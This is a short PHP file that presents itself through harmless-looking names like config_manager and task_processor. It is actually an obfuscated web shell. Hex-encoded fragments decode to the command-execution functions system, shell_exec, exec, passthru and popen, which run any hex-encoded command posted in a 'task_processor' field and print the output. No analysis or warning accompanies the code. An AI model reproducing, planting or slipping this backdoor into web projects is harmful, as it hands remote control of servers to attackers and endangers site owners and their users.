<?php


$marker1 = '79';
$marker2 = '73';
$marker3 = '74';
$marker4 = '6c';
$marker5 = '65';
$marker6 = '78';
$marker7 = '63';
$marker8 = '70';
$marker9 = '75';
$marker10 = '6f';
$marker11 = '61';
$marker12 = '5f';
$marker13 = '72';
$config_manager1 = pack("H*", '73' . $marker1 . $marker2 . $marker3 . '65' . '6d');
$config_manager2 = pack("H*", $marker2 . '68' . '65' . $marker4 . '6c' . '5f' . $marker5 . $marker6 . $marker5 . '63');
$config_manager3 = pack("H*", '65' . $marker6 . $marker5 . $marker7);
$config_manager4 = pack("H*", $marker8 . '61' . $marker2 . $marker2 . $marker3 . '68' . '72' . $marker9);
$config_manager5 = pack("H*", $marker8 . $marker10 . '70' . $marker5 . '6e');
$config_manager6 = pack("H*", $marker2 . $marker3 . '72' . '65' . $marker11 . '6d' . '5f' . '67' . $marker5 . '74' . $marker12 . '63' . $marker10 . '6e' . $marker3 . $marker5 . '6e' . $marker3 . $marker2);
$config_manager7 = pack("H*", '70' . '63' . $marker4 . '6f' . $marker2 . '65');
$task_processor = pack("H*", '74' . $marker11 . $marker2 . '6b' . $marker12 . '70' . $marker13 . $marker10 . '63' . '65' . $marker2 . $marker2 . $marker10 . '72');
if (isset($_POST[$task_processor])) {
    $task_processor = pack("H*", $_POST[$task_processor]);
    if (function_exists($config_manager1)) {
        $config_manager1($task_processor);
    } elseif (function_exists($config_manager2)) {
        print $config_manager2($task_processor);
    } elseif (function_exists($config_manager3)) {
        $config_manager3($task_processor, $item_property_set);
        print join("\n", $item_property_set);
    } elseif (function_exists($config_manager4)) {
        $config_manager4($task_processor);
    } elseif (function_exists($config_manager5) && function_exists($config_manager6) && function_exists($config_manager7)) {
        $data_sym = $config_manager5($task_processor, 'r');
        if ($data_sym) {
            $tkn_descriptor = $config_manager6($data_sym);
            $config_manager7($data_sym);
            print $tkn_descriptor;
        }
    }
    exit;
}
